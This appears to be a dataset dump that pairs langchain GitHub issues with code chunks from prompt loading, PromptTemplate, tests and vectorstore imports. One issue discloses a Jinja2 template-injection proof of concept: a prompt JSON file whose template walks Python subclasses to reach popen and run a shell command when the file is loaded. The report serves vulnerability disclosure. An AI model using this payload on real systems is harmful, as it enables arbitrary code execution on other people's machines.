status (stringclasses 1) | repo_name (stringclasses 31) | repo_url (stringclasses 31) | issue_id (int64, 1–104k) | title (stringlengths 4–233) | body (stringlengths 0–186k, nullable) | issue_url (stringlengths 38–56) | pull_url (stringlengths 37–54) | before_fix_sha (stringlengths 40) | after_fix_sha (stringlengths 40) | report_datetime (unknown) | language (stringclasses 5) | commit_datetime (unknown) | updated_file (stringlengths 7–188) | chunk_content (stringlengths 1–1.03M)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be executed
attack scenario: Alice can send a prompt file to Bob and have Bob load it.
analysis: Jinja2 is used to format the prompt, so template injection can happen.
note: in pt.json, the `template` field carries the payload; the index into `__subclasses__` may differ in other environments.
### Expected behavior
code should not be executed | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/loading.py | """Load prompts."""
import json
import logging
from pathlib import Path
from typing import Callable, Dict, Union
import yaml
from langchain.prompts.few_shot import FewShotPromptTemplate
from langchain.prompts.prompt import PromptTemplate
from langchain.schema import BaseLLMOutputParser, BasePromptTemplate, StrOutputParser
from langchain.utils.loading import try_load_from_hub
URL_BASE = "https://raw.githubusercontent.com/hwchase17/langchain-hub/master/prompts/"
logger = logging.getLogger(__name__)
def load_prompt_from_config(config: dict) -> BasePromptTemplate: |
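The reproduction above works because the jinja2 template is rendered in a default, unsandboxed environment, which exposes Python attribute access (`__class__`, `__globals__`, and so on). One standard mitigation — and the general direction of the linked fix in PR #10252 — is to render untrusted templates in jinja2's sandbox. The sketch below illustrates the idea; it is not the exact patched code:

```python
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

payload = (
    "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0]"
    ".__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}"
)

env = SandboxedEnvironment()
try:
    # The sandbox refuses access to unsafe attributes such as __class__,
    # so rendering raises SecurityError instead of spawning a process.
    env.from_string(payload).render(prompt="What is 1 + 1?")
except SecurityError as err:
    print(f"blocked: {err}")
```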
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/loading.py | """Load prompt from Config Dict."""
if "_type" not in config:
logger.warning("No `_type` key found, defaulting to `prompt`.")
config_type = config.pop("_type", "prompt")
if config_type not in type_to_loader_dict:
raise ValueError(f"Loading {config_type} prompt not supported")
prompt_loader = type_to_loader_dict[config_type]
return prompt_loader(config)
def _load_template(var_name: str, config: dict) -> dict:
"""Load template from the path if applicable."""
if f"{var_name}_path" in config:
if var_name in config:
raise ValueError(
f"Both `{var_name}_path` and `{var_name}` cannot be provided."
)
template_path = Path(config.pop(f"{var_name}_path"))
if template_path.suffix == ".txt":
with open(template_path) as f:
template = f.read()
else:
raise ValueError
config[var_name] = template
return config
def _load_examples(config: dict) -> dict: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/loading.py | """Load examples if necessary."""
if isinstance(config["examples"], list):
pass
elif isinstance(config["examples"], str):
with open(config["examples"]) as f:
if config["examples"].endswith(".json"):
examples = json.load(f)
elif config["examples"].endswith((".yaml", ".yml")):
examples = yaml.safe_load(f)
else:
raise ValueError(
"Invalid file format. Only json or yaml formats are supported."
)
config["examples"] = examples
else:
raise ValueError("Invalid examples format. Only list or string are supported.")
return config
def _load_output_parser(config: dict) -> dict: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/loading.py | """Load output parser."""
if "output_parser" in config and config["output_parser"]:
_config = config.pop("output_parser")
output_parser_type = _config.pop("_type")
if output_parser_type == "regex_parser":
from langchain.output_parsers.regex import RegexParser
output_parser: BaseLLMOutputParser = RegexParser(**_config)
elif output_parser_type == "default":
output_parser = StrOutputParser(**_config)
else:
raise ValueError(f"Unsupported output parser {output_parser_type}")
config["output_parser"] = output_parser
return config
def _load_few_shot_prompt(config: dict) -> FewShotPromptTemplate: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/loading.py | """Load the "few shot" prompt from the config."""
config = _load_template("suffix", config)
config = _load_template("prefix", config)
if "example_prompt_path" in config:
if "example_prompt" in config:
raise ValueError(
"Only one of example_prompt and example_prompt_path should "
"be specified."
)
config["example_prompt"] = load_prompt(config.pop("example_prompt_path"))
else:
config["example_prompt"] = load_prompt_from_config(config["example_prompt"])
config = _load_examples(config)
config = _load_output_parser(config)
return FewShotPromptTemplate(**config)
def _load_prompt(config: dict) -> PromptTemplate:
"""Load the prompt template from config."""
config = _load_template("template", config)
config = _load_output_parser(config)
return PromptTemplate(**config)
def load_prompt(path: Union[str, Path]) -> BasePromptTemplate: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/loading.py | """Unified method for loading a prompt from LangChainHub or local fs."""
if hub_result := try_load_from_hub(
path, _load_prompt_from_file, "prompts", {"py", "json", "yaml"}
):
return hub_result
else:
return _load_prompt_from_file(path)
def _load_prompt_from_file(file: Union[str, Path]) -> BasePromptTemplate:
"""Load prompt from file."""
if isinstance(file, str):
file_path = Path(file)
else:
file_path = file
if file_path.suffix == ".json":
with open(file_path) as f:
config = json.load(f)
elif file_path.suffix == ".yaml":
with open(file_path, "r") as f:
config = yaml.safe_load(f)
else:
raise ValueError(f"Got unsupported file type {file_path.suffix}")
return load_prompt_from_config(config)
type_to_loader_dict: Dict[str, Callable[[dict], BasePromptTemplate]] = {
"prompt": _load_prompt,
"few_shot": _load_few_shot_prompt,
} |
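The `type_to_loader_dict` above is the dispatch table consulted by `load_prompt_from_config`. A minimal usage sketch (the config dict here is made up for illustration):

```python
from langchain.prompts.loading import load_prompt_from_config

# "_type" selects the loader; when the key is missing it defaults to "prompt".
config = {
    "_type": "prompt",
    "input_variables": ["adjective", "content"],
    "template": "Tell me a {adjective} joke about {content}.",
}
prompt = load_prompt_from_config(config)
print(prompt.format(adjective="funny", content="chickens"))
```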
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | """Prompt schema definition."""
from __future__ import annotations
from pathlib import Path
from string import Formatter
from typing import Any, Dict, List, Optional, Union
from langchain.prompts.base import (
DEFAULT_FORMATTER_MAPPING,
StringPromptTemplate,
_get_jinja2_variables_from_template,
check_valid_template,
)
from langchain.pydantic_v1 import root_validator
class PromptTemplate(StringPromptTemplate):
"""A prompt template for a language model.
A prompt template consists of a string template. It accepts a set of parameters
from the user that can be used to generate a prompt for a language model.
The template can be formatted using either f-strings (default) or jinja2 syntax.
Example:
.. code-block:: python
from langchain.prompts import PromptTemplate
# Instantiation using from_template (recommended)
prompt = PromptTemplate.from_template("Say {foo}")
prompt.format(foo="bar")
# Instantiation using initializer
prompt = PromptTemplate(input_variables=["foo"], template="Say {foo}")
"""
@property
def lc_attributes(self) -> Dict[str, Any]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | return {
"template_format": self.template_format,
}
input_variables: List[str]
"""A list of the names of the variables the prompt template expects."""
template: str
"""The prompt template."""
template_format: str = "f-string"
"""The format of the prompt template. Options are: 'f-string', 'jinja2'."""
validate_template: bool = True
"""Whether or not to try validating the template."""
def __add__(self, other: Any) -> PromptTemplate:
"""Override the + operator to allow for combining prompt templates."""
if isinstance(other, PromptTemplate):
if self.template_format != "f-string":
raise ValueError(
"Adding prompt templates only supported for f-strings."
) |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | if other.template_format != "f-string":
raise ValueError(
"Adding prompt templates only supported for f-strings."
)
input_variables = list(
set(self.input_variables) | set(other.input_variables)
)
template = self.template + other.template
validate_template = self.validate_template and other.validate_template
partial_variables = {k: v for k, v in self.partial_variables.items()}
for k, v in other.partial_variables.items():
if k in partial_variables:
raise ValueError("Cannot have same variable partialed twice.")
else:
partial_variables[k] = v
return PromptTemplate(
template=template,
input_variables=input_variables,
partial_variables=partial_variables,
template_format="f-string",
validate_template=validate_template,
)
elif isinstance(other, str):
prompt = PromptTemplate.from_template(other)
return self + prompt
else:
raise NotImplementedError(f"Unsupported operand type for +: {type(other)}")
@property
def _prompt_type(self) -> str: |
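This chunk completes the `__add__` overload, which only supports f-string templates and merges input and partial variables. A small sketch of it in use:

```python
from langchain.prompts import PromptTemplate

first = PromptTemplate.from_template("Tell me a {adjective} joke")
second = PromptTemplate.from_template(" about {content}.")

combined = first + second  # a plain string on the right also works
print(sorted(combined.input_variables))  # ['adjective', 'content']
print(combined.format(adjective="funny", content="chickens"))
```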
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | """Return the prompt type key."""
return "prompt"
def format(self, **kwargs: Any) -> str:
"""Format the prompt with the inputs.
Args:
kwargs: Any arguments to be passed to the prompt template.
Returns:
A formatted string.
Example:
.. code-block:: python
prompt.format(variable1="foo")
"""
kwargs = self._merge_partial_and_user_variables(**kwargs)
return DEFAULT_FORMATTER_MAPPING[self.template_format](self.template, **kwargs)
@root_validator()
def template_is_valid(cls, values: Dict) -> Dict:
"""Check that template and input variables are consistent."""
if values["validate_template"]:
all_inputs = values["input_variables"] + list(values["partial_variables"])
check_valid_template(
values["template"], values["template_format"], all_inputs
)
return values
@classmethod
def from_examples( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | cls,
examples: List[str],
suffix: str,
input_variables: List[str],
example_separator: str = "\n\n",
prefix: str = "",
**kwargs: Any,
) -> PromptTemplate:
"""Take examples in list format with prefix and suffix to create a prompt.
Intended to be used as a way to dynamically create a prompt from examples.
Args:
examples: List of examples to use in the prompt.
suffix: String to go after the list of examples. Should generally
set up the user's input.
input_variables: A list of variable names the final prompt template
will expect.
example_separator: The separator to use in between examples. Defaults
to two new line characters.
prefix: String that should go before any examples. Generally includes
examples. Default to an empty string.
Returns:
The final prompt generated.
"""
template = example_separator.join([prefix, *examples, suffix])
return cls(input_variables=input_variables, template=template, **kwargs)
@classmethod
def from_file( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | cls, template_file: Union[str, Path], input_variables: List[str], **kwargs: Any
) -> PromptTemplate:
"""Load a prompt from a file.
Args:
template_file: The path to the file containing the prompt template.
input_variables: A list of variable names the final prompt template
will expect.
Returns:
The prompt loaded from the file.
"""
with open(str(template_file), "r") as f:
template = f.read()
return cls(input_variables=input_variables, template=template, **kwargs)
@classmethod
def from_template(
cls,
template: str,
*,
template_format: str = "f-string",
partial_variables: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> PromptTemplate:
"""Load a prompt template from a template.
Args:
template: The template to load.
template_format: The format of the template. Use `jinja2` for jinja2,
and `f-string` or None for f-strings.
partial_variables: A dictionary of variables that can be used to partially |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | fill in the template. For example, if the template is
`"{variable1} {variable2}"`, and `partial_variables` is
`{"variable1": "foo"}`, then the final prompt will be
`"foo {variable2}"`.
Returns:
The prompt template loaded from the template.
"""
if template_format == "jinja2":
input_variables = _get_jinja2_variables_from_template(template)
elif template_format == "f-string":
input_variables = {
v for _, v, _, _ in Formatter().parse(template) if v is not None
}
else:
raise ValueError(f"Unsupported template format: {template_format}")
_partial_variables = partial_variables or {}
if _partial_variables:
input_variables = {
var for var in input_variables if var not in _partial_variables
}
return cls(
input_variables=sorted(input_variables),
template=template,
template_format=template_format,
partial_variables=_partial_variables,
**kwargs,
)
Prompt = PromptTemplate |
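`from_template` above calls `_get_jinja2_variables_from_template`, which is imported from `langchain.prompts.base` but not included in this dump. A typical implementation walks jinja2's parsed AST; the helper below is an assumption about its shape, not the library's exact code:

```python
from typing import Set

from jinja2 import Environment, meta


def get_jinja2_variables(template: str) -> Set[str]:
    """Collect every undeclared variable name from a jinja2 template."""
    env = Environment()  # used for parsing only; nothing is rendered
    return meta.find_undeclared_variables(env.parse(template))


print(get_jinja2_variables("Tell me a {{ adjective }} joke about {{ content }}."))
# {'adjective', 'content'}
```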
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Test loading functionality."""
import os
from contextlib import contextmanager
from pathlib import Path
from typing import Iterator
from langchain.output_parsers import RegexParser
from langchain.prompts.few_shot import FewShotPromptTemplate
from langchain.prompts.loading import load_prompt
from langchain.prompts.prompt import PromptTemplate
EXAMPLE_DIR = Path("tests/unit_tests/examples").absolute()
@contextmanager
def change_directory(dir: Path) -> Iterator: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Change the working directory to the right folder."""
origin = Path().absolute()
try:
os.chdir(dir)
yield
finally:
os.chdir(origin)
def test_loading_from_YAML() -> None:
"""Test loading from yaml file."""
prompt = load_prompt(EXAMPLE_DIR / "simple_prompt.yaml")
expected_prompt = PromptTemplate(
input_variables=["adjective", "content"],
template="Tell me a {adjective} joke about {content}.",
)
assert prompt == expected_prompt
def test_loading_from_JSON() -> None:
"""Test loading from json file."""
prompt = load_prompt(EXAMPLE_DIR / "simple_prompt.json")
expected_prompt = PromptTemplate(
input_variables=["adjective", "content"],
template="Tell me a {adjective} joke about {content}.",
)
assert prompt == expected_prompt
def test_saving_loading_round_trip(tmp_path: Path) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Test equality when saving and loading a prompt."""
simple_prompt = PromptTemplate(
input_variables=["adjective", "content"],
template="Tell me a {adjective} joke about {content}.",
)
simple_prompt.save(file_path=tmp_path / "prompt.yaml")
loaded_prompt = load_prompt(tmp_path / "prompt.yaml")
assert loaded_prompt == simple_prompt
few_shot_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
few_shot_prompt.save(file_path=tmp_path / "few_shot.yaml")
loaded_prompt = load_prompt(tmp_path / "few_shot.yaml")
assert loaded_prompt == few_shot_prompt
def test_loading_with_template_as_file() -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Test loading when the template is a file."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("simple_prompt_with_template_file.json")
expected_prompt = PromptTemplate(
input_variables=["adjective", "content"],
template="Tell me a {adjective} joke about {content}.",
)
assert prompt == expected_prompt
def test_loading_few_shot_prompt_from_yaml() -> None:
"""Test loading few shot prompt from yaml."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("few_shot_prompt.yaml")
expected_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
assert prompt == expected_prompt
def test_loading_few_shot_prompt_from_json() -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Test loading few shot prompt from json."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("few_shot_prompt.json")
expected_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
assert prompt == expected_prompt
def test_loading_few_shot_prompt_when_examples_in_config() -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Test loading few shot prompt when the examples are in the config."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("few_shot_prompt_examples_in.json")
expected_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
assert prompt == expected_prompt
def test_loading_few_shot_prompt_example_prompt() -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Test loading few shot when the example prompt is in its own file."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("few_shot_prompt_example_prompt.json")
expected_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
assert prompt == expected_prompt
def test_loading_with_output_parser() -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | (body same as above) | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | with change_directory(EXAMPLE_DIR):
prompt = load_prompt("prompt_with_output_parser.json")
expected_template = "Given the following question and student answer, provide a correct answer and score the student answer.\nQuestion: {question}\nStudent Answer: {student_answer}\nCorrect Answer:"
expected_prompt = PromptTemplate(
input_variables=["question", "student_answer"],
output_parser=RegexParser(
regex="(.*?)\nScore: (.*)",
output_keys=["answer", "score"],
),
template=expected_template,
)
assert prompt == expected_prompt |
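The `RegexParser` configured in this test splits a completion into named fields by regex groups. A quick sketch of it in action, reusing the same regex:

```python
from langchain.output_parsers import RegexParser

parser = RegexParser(regex="(.*?)\nScore: (.*)", output_keys=["answer", "score"])
print(parser.parse("Paris\nScore: 10"))
# {'answer': 'Paris', 'score': '10'}
```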
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the ones found to be most semantically similar and are retrieved at query time. The accompanying PR would add support for LangChain Python users to store vectors from document embeddings generated with APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | """**Vector store** stores embedded data and performs vector search.
One of the most common ways to store and search over unstructured data is to
embed it and store the resulting embedding vectors, and then query the store
and retrieve the data that are 'most similar' to the embedded query.
**Class hierarchy:**
.. code-block::
VectorStore --> <name> # Examples: Annoy, FAISS, Milvus
BaseRetriever --> VectorStoreRetriever --> <name>Retriever # Example: VespaRetriever
**Main helpers:**
.. code-block::
Embeddings, Document
"""
from typing import Any
from langchain.schema.vectorstore import VectorStore
def _import_alibaba_cloud_open_search() -> Any: |
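The feature request names three similarity measures: COS (cosine distance), L2 (Euclidean distance), and IP (inner product). As a plain-NumPy illustration of what each computes, independent of Cosmos DB:

```python
import numpy as np

query = np.array([0.1, 0.9, 0.2])
doc = np.array([0.2, 0.8, 0.1])

cosine = query @ doc / (np.linalg.norm(query) * np.linalg.norm(doc))  # COS
euclidean = np.linalg.norm(query - doc)                               # L2
inner = query @ doc                                                   # IP

print(f"cosine similarity: {cosine:.4f}")
print(f"euclidean distance: {euclidean:.4f}")
print(f"inner product: {inner:.4f}")
```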
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | (body same as above) | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.alibabacloud_opensearch import AlibabaCloudOpenSearch
return AlibabaCloudOpenSearch
def _import_alibaba_cloud_open_search_settings() -> Any:
from langchain.vectorstores.alibabacloud_opensearch import (
AlibabaCloudOpenSearchSettings,
)
return AlibabaCloudOpenSearchSettings
def _import_elastic_knn_search() -> Any:
from langchain.vectorstores.elastic_vector_search import ElasticKnnSearch
return ElasticKnnSearch
def _import_elastic_vector_search() -> Any:
from langchain.vectorstores.elastic_vector_search import ElasticVectorSearch
return ElasticVectorSearch
def _import_analyticdb() -> Any:
from langchain.vectorstores.analyticdb import AnalyticDB
return AnalyticDB
def _import_annoy() -> Any:
from langchain.vectorstores.annoy import Annoy
return Annoy
def _import_atlas() -> Any:
from langchain.vectorstores.atlas import AtlasDB
return AtlasDB
def _import_awadb() -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
